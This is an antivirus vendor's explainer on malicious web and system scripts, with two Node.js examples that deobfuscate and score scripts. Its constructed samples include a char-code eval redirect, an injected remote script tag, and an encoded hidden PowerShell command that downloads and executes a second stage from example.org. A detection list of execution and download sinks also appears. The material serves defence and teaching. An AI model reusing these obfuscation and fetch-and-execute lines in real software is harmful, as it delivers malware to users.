How Malicious Scripts Work, and How to Protect Yourself Against Them | Antivirus

Today's edition gives you an insight into the world of malicious scripts: what they are, how they reach you, and how you can protect yourself against them.

If we were to describe all of the malicious scripts our analysts have ever examined, this post would be the size of a textbook. That alone tells you that scripts are one of the most diverse, and one of the most widespread, types of malware.




So What Is a Malicious Script?

In the broadest sense, a script is program code written in an interpreted language. Scripts are not run by the processor directly but by an external program, the interpreter (a browser's JavaScript engine, PowerShell, bash, and so on). Unlike compiled executables, scripts are usually plain text files that a human can read. Recovering readable source from a compiled binary requires disassembly or decompilation and rarely yields the original code, whereas a script always carries its source with it (even if, as we will see, that source is often obfuscated). In principle, "bad" scripts are no different from "good" ones: the language and the interpreter are the same, only the intent differs.

Malicious scripts can be divided into two types:

1.     Scripts embedded in the code of websites, which are interpreted by the visitor's browser and carry out the actions the attacker specified.

2.     Scripts designed to run on a user's computer. They are executed by operating system components (script hosts) and have access to the system's APIs (file system, processes, etc.).

In the Internet context, "malicious script" most commonly means the first type. Such scripts are usually written in JavaScript (run in the visitor's browser) or PHP (run on the web server). Injected into the code of compromised websites, they mine cryptocurrency in the visitor's browser, display advertisements, or redirect to other websites that are often fraudulent and dangerous. Server-side web scripts can also act as PHP infectors that inject malicious code into the "good" scripts of the site. Browser extensions can contain malicious code as well.

In theory, a website script can also carry an exploit: data crafted so that a bug in the browser misinterprets it and the attacker gains access to the visitor's system. Such exploits have become less common because modern browsers are sandboxed and restrict access to operating system functions, so it is now unlikely that malicious code on a website will compromise your computer by itself. Nevertheless, the functions mentioned above are enough to make a user's life miserable: advertising, scams, phishing, browser slowdowns, and even the compromise of the website itself are all done with web scripts. They are cross-platform and extremely common: attackers use them en masse to infect websites and web servers.
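As an added illustration (this is not code from the original post or from Protegent), the following Node.js script shows the two most common tricks of injected web scripts, hiding the payload as a list of character codes or as a percent-encoded string and executing it through eval() or document.write(), and how an analyst peels those layers statically, without executing anything. Both samples are constructed here and only reference example.org and example.net; the function names and the URL regex are choices made for this example.

```javascript
// Added example: statically recovering the payload of an obfuscated web script.
// Samples are CONSTRUCTED for this article and point only at example.org /
// example.net. They use the same tricks as real injected scripts: the payload is
// stored as String.fromCharCode(...) codes or a percent-encoded string, so a
// byte signature for "location.href" never appears in the file as stored.

const PAYLOAD_PLAIN = 'location.href="https://example.org/landing?ref=compromised"';

// Build the obfuscated form the way a dropper would (char codes, then eval).
function obfuscate(src) {
  const codes = Array.from(src, (ch) => ch.charCodeAt(0)).join(',');
  return `var _0x=String.fromCharCode(${codes});eval(_0x);`;
}

const OBFUSCATED_SAMPLE = obfuscate(PAYLOAD_PLAIN);
// Second constructed sample: a percent-encoded <script> tag written into the page.
const UNESCAPE_SAMPLE =
  "document.write(unescape('%3Cscript%20src%3D%22https%3A%2F%2Fexample.net%2Fm.js%22%3E%3C%2Fscript%3E'))";

// Decode every String.fromCharCode(...) literal list without executing anything.
function decodeFromCharCode(src) {
  const re = /String\.fromCharCode\(([\d\s,]+)\)/g;
  const decoded = [];
  let m;
  while ((m = re.exec(src)) !== null) {
    const codes = m[1].split(',').map((n) => parseInt(n.trim(), 10));
    if (codes.some(Number.isNaN)) continue;
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// Decode string literals passed to unescape() / decodeURIComponent().
function decodeUnescape(src) {
  const re = /(?:unescape|decodeURIComponent)\((['"])((?:%[0-9a-fA-F]{2}|[^'"])*)\1\)/g;
  const decoded = [];
  let m;
  while ((m = re.exec(src)) !== null) {
    try { decoded.push(decodeURIComponent(m[2])); } catch { /* malformed, skip */ }
  }
  return decoded;
}

// Execution sinks that turn recovered text back into code or markup.
const SINKS = [
  ['eval', /\beval\s*\(/],
  ['Function', /new\s+Function\s*\(/],
  ['document.write', /document\.write(?:ln)?\s*\(/],
];

// Pull out the URLs from the stored text plus every decoded layer.
function extractRedirectTargets(src) {
  const decodedLayers = [...decodeFromCharCode(src), ...decodeUnescape(src)];
  const urls = new Set();
  for (const layer of [src, ...decodedLayers]) {
    for (const u of layer.match(/https?:\/\/[^\s"'<>]+/g) || []) urls.add(u);
  }
  return {
    sinks: SINKS.filter(([, re]) => re.test(src)).map(([name]) => name),
    decodedLayers,
    urls: [...urls],
  };
}

// A naive byte signature on the plaintext misses the stored form entirely.
function signatureHit(src, needle = 'location.href') {
  return src.includes(needle);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(OBFUSCATED_SAMPLE.slice(0, 70) + '...');
  console.log('signature hit on stored file:', signatureHit(OBFUSCATED_SAMPLE));
  console.log(extractRedirectTargets(OBFUSCATED_SAMPLE));
  console.log(extractRedirectTargets(UNESCAPE_SAMPLE));
}
```

The decoders deliberately handle only literal arguments: if the char codes are themselves computed at run time (a second layer), the static pass returns nothing, which is exactly when an analyst moves to a sandboxed JavaScript interpreter instead of trying to keep up with the obfuscator by hand.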

But it is not just websites that are at risk. The second type of malicious script is run by operating system components. These scripts can be written in a variety of scripting languages: JScript, VBScript, PowerShell, Perl, Python, and others.

These scripts are far more dangerous because they access system APIs directly. A script rarely carries the main malicious functionality itself; far more often it is used to load other malicious modules onto the infected system, or for intermediate and auxiliary tasks. PowerShell scripts, for example, are used to run exploits or utilities that enable penetration of the system or network. Although scripting is usually thought of as cross-platform, many malicious scripts only work on the operating system they were written for, because they depend on its APIs: the aforementioned PowerShell, BAT and JScript scripts are typical of Windows, AppleScript is intended for macOS, and Linux malware is often distributed as a bash script.

System scripts are mostly distributed via email, hosted on hacked and malicious websites, downloaded by other programs already on the machine, or spread via removable media and network shares.

In addition, almost all malicious scripts are obfuscated: the code is deliberately rewritten to be hard to read, for example by storing strings as character codes or base64 and decoding them only at run time. Because a re-obfuscated script no longer matches any stored byte pattern, techniques other than traditional signature comparison often have to be used to recognize it.

To neutralize Windows system scripts, we apply machine learning algorithms embedded in the virus engine. This approach lets us detect malicious code regardless of how heavily it is obfuscated, something that signature-based analysis alone cannot achieve.
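To make the difference between a byte signature and a behaviour-oriented check concrete, here is an added example (it is not Protegent's engine and not code from the original post): a small indicator-based triage script in Node.js. It scores scripts of several languages by the execution, download and decoding sinks they use (eval, Invoke-Expression, DownloadString, WScript.Shell, and so on), and first peels two common encoding layers, PowerShell's -EncodedCommand (base64 of the UTF-16LE script text) and VBScript Chr() chains, so that an indicator hidden behind an encoding is still counted. The four samples, the indicator list, the weights and the threshold are all constructed for this example; the two "malicious" samples only reference example.org and are never executed.

```javascript
// Added example: indicator-based triage of scripts, as a contrast to byte
// signatures. Samples, indicator list, weights and threshold are constructed
// for this article; this is not Protegent's engine.

// Execution, download and decoding sinks per language: [label, regex, weight].
const INDICATORS = [
  ['js-eval',       /\beval\s*\(|new\s+Function\s*\(/,                        3],
  ['js-charcode',   /String\.fromCharCode/,                                   2],
  ['ps-iex',        /\b(?:IEX|Invoke-Expression)\b/i,                         3],
  ['ps-encoded',    /-(?:e|ec|enc|encodedcommand)\b\s+[A-Za-z0-9+/=]{20,}/i,  3],
  ['ps-download',   /DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b/i, 2],
  ['ps-hidden',     /-w(?:indowstyle)?\s+hidden|-nop\b|-NonInteractive\b/i,   1],
  ['base64-decode', /FromBase64String|\batob\s*\(|base64\s+-d\b/i,            2],
  ['vbs-shell',     /WScript\.Shell|Shell\.Application/i,                     2],
  ['vbs-chr-build', /(?:Chr\(\d+\)\s*&\s*){4,}/i,                             3],
  ['vbs-execute',   /\bExecute(?:Global)?\s*[("]/i,                           2],
];
const SUSPICIOUS_THRESHOLD = 5; // illustrative cut-off

// PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
function decodeEncodedCommand(src) {
  const m = /-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{20,})/i.exec(src);
  return m ? Buffer.from(m[1], 'base64').toString('utf16le') : null;
}

// VBScript hides strings as Chr(87) & Chr(83) & ...; rebuild them statically.
function decodeChrChains(src) {
  const chains = src.match(/(?:Chr\(\d+\)\s*&?\s*){2,}/gi) || [];
  return chains.map((c) => String.fromCharCode(...c.match(/\d+/g).map(Number)));
}

// Shannon entropy in bits per character.
function shannonEntropy(text) {
  const counts = new Map();
  for (const ch of text) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) { const p = n / text.length; h -= p * Math.log2(p); }
  return h;
}

function triageScript(src) {
  // Layer 0 is the file as stored; decoded layers are appended so that an
  // indicator hidden behind an encoding still counts (once per indicator).
  const decodedCommand = decodeEncodedCommand(src);
  const layers = [src, ...(decodedCommand ? [decodedCommand] : []), ...decodeChrChains(src)];
  const hits = [];
  let score = 0;
  for (const [label, re, weight] of INDICATORS) {
    if (layers.some((layer) => re.test(layer))) { hits.push(label); score += weight; }
  }
  // Entropy of the longest whitespace-free token is a hint for packed or base64
  // blobs; reported but not scored, since it is only meaningful on longer blobs.
  const longestToken = src.split(/\s+/).reduce((a, b) => (b.length > a.length ? b : a), '');
  return {
    score,
    hits,
    verdict: score >= SUSPICIOUS_THRESHOLD ? 'suspicious' : 'benign',
    decodedCommand,
    longestTokenEntropy: +shannonEntropy(longestToken).toFixed(2),
  };
}

// Constructed samples; the "bad" ones only point at example.org and never run.
const chrChain = (s) => Array.from(s, (c) => `Chr(${c.charCodeAt(0)})`).join(' & ');
const STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://example.org/stage2.ps1')";
const SAMPLES = {
  benignJs: 'function add(a, b) { return a + b; }\nconsole.log(add(2, 3));',
  benignPs: 'Invoke-WebRequest -Uri https://example.org/report.csv -OutFile report.csv',
  encodedPs: 'powershell.exe -nop -w hidden -EncodedCommand ' +
    Buffer.from(STAGE2, 'utf16le').toString('base64'),
  chrVbs: `Set o = CreateObject(${chrChain('WScript.Shell')})\r\n` +
    `o.Run ${chrChain('cmd /c echo hi')}, 0, True`,
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, src] of Object.entries(SAMPLES)) {
    const r = triageScript(src);
    console.log(`${name.padEnd(10)} ${r.verdict.padEnd(10)} score=${r.score} hits=${r.hits.join(',')}`);
  }
}
```

Two things worth noticing when you run it: the legitimate Invoke-WebRequest one-liner scores below the threshold because a single download sink is normal for an admin script, and the VBScript sample is only caught because the Chr() chain is decoded first; on the stored text alone, "WScript.Shell" never appears. Real engines layer far more context (parent process, file origin, run-time behaviour) on top of static indicators like these.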

Bottom line: scripts can carry a wide variety of malicious payloads: exploits, miners, utilities, adware Trojans, and even encrypting ransomware. Reliable protection against them is a must.

Recommendation

To protect your computer and your data, we recommend the following:

1.     Use the all-round protection of Protegent Antivirus, which combines signature, heuristic and machine learning technologies, web traffic control, anti-spam, and regularly updated databases of unwanted and dangerous websites.

2.     Keep the settings recommended by the software developer.

3.     Don't ignore security warnings from antivirus apps, browsers, search engines, and operating systems.

4.     Update your operating system, your antivirus software and all other software regularly.

5.     Do not install dubious browser extensions and add-ons.

6.     If you run a website: use a web application firewall, keep your CMS and server software up to date, and back up your website regularly.
